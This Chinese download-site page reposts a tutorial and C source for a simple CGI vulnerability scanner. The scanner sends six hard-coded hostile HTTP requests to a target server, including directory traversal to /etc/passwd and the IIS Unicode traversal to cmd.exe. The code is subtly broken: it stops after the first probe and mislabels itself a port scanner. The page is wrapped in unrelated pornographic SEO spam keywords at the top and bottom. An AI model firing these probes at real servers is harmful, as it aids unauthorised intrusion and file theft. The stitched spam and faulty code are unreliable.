日本国产亚洲-日本国产一区-日本国产一区二区三区-日本韩国欧美一区-日本韩国欧美在线-日本韩国欧美在线观看

當前位置:雨林木風下載站 > 技術開發教程 > 詳細頁面

編寫漏洞掃描器

編寫漏洞掃描器

更新時間:2022-05-13 文章作者:未知 信息來源:網絡 閱讀次數:

一、漏洞掃描器基本原理:  

編寫漏洞掃描器探查遠程服務器上可能存在的具有安全隱患的文件是否存在,它的socket建立過程和上面的端口掃描器是相同的,所不同的是漏洞掃描器通常使用80端口,然后對這個端口發送一個GET文件的請求,服務器接收到請求會返回文件內容,如果文件不存在則返回一個錯誤提示,通過接收返回內容可以判斷文件是否存在。發送和接收數據需要使用函數send()和recv(),另外對流中存在的字符串進行判斷需要使用函數strstr(),這除了需要具備socket函數庫的知識以外,還需要一些有關string函數庫的知識。  

二、簡單的漏洞掃描源代碼:  

/********************************************/  
/* 端口掃描器 源代碼 */  
/* CgiScanner.cpp */  
/********************************************/  

#include <stdio.h>  
#include <string.h>  
#include <winsock.h>  

int main(int argc,char *argv[])  
{  
if(argc!=2){  
printf("Useage : scan [IP address]\n");  
return(1);  
}  

struct sockaddr_in blah;  
struct hostent *he;  
WSADATA wsaData;  
int i;  
WORD wVersionRequested;  
SOCKET sock;  

char buff[1024];  
char *ex[10];  
ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";  
ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";  
ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";  
ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";  
ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";  
ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";  
char *fmsg="HTTP/1.1 200 OK";  

wVersionRequested = MAKEWORD( 1, 1 );  
if (WSAStartup(wVersionRequested , &wsaData)){  
printf("Winsock Initialization failed.\n");  
exit(1);  
}  

if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){  
printf("Can not create socket.\n");  
exit(1);  
}  
sock = socket(AF_INET,SOCK_STREAM,0);  
blah.sin_family = AF_INET;  
blah.sin_port = htons(80);  
blah.sin_addr.s_addr= inet_addr(argv[1]);  

if ((he=gethostbyname(argv[1]))!=NULL){  
memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);  
}  
else{  
if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){  
WSACleanup();  
exit(1);  
}  
}  

for (i=1 ; i<7; i++) {
if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){
send(sock,ex[i],strlen(ex[i]),0);
recv(sock,buff,sizeof(buff),0);
if(strstr(buff,fmsg)!=NULL){
printf("\nFound :%s\n", ex[i]);
}
}

closesocket(sock);
WSACleanup();
return(1);
}
}

這段代碼可以檢測六個漏洞,讀者可以根據自己的需要增加漏洞掃描的數量。程序實現的很簡潔,概括起來這段程序完成了一下四項工作:

1、連接目標主機SERVER;
2、向目標主機發送GET請求;
3、接收目標返回數據;
4、根據返回數據判斷文件是否存在。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

主站蜘蛛池模板: 亚洲精品区| 亚洲欧美日韩国产 | 亚洲视频欧洲视频 | 清纯漂亮小美女准备啪啪 | 国产成人午夜精品免费视频 | 日本一级在线播放线观看视频 | 噜噜噜福利视频在线观看 | 免费日本在线视频 | 91av欧美| 久久精品青草社区 | 亚洲国产欧美日韩精品小说 | 亚洲欧美日韩高清一区二区三区 | 日本爱爱视频 | www.久操 | 久久综合精品国产一区二区三区 | 国内精品视频在线播放一区 | 天天曰天天操 | www视频在线观看免费 | 久久精品看片 | 狠狠干伊人 | 日韩在线视频不卡一区二区三区 | 国产三级精品播放 | 99精品在线观看 | 久久综合狠狠综合狠狠 | 国产精品久久久久久久久久影院 | 日本高清天码一区在线播放 | 欧美另类久久久精品 | 亚洲欧美日韩另类精品一区二区三区 | 宅男撸66在线播放 | freese×video性欧美丝袜 | 1024国产手机视频基地 | 久久99热久久国产精品 | 天天射天天怕 | a级粗大硬长爽猛视频免费 a级高清 | 亚洲天堂视频在线免费观看 | 日日碰狠狠 | 日韩中字在线 | 色婷婷免费视频 | 亚洲精品高清视频 | 1000部18未成人禁止国产 | 1769国产精品免费视频 |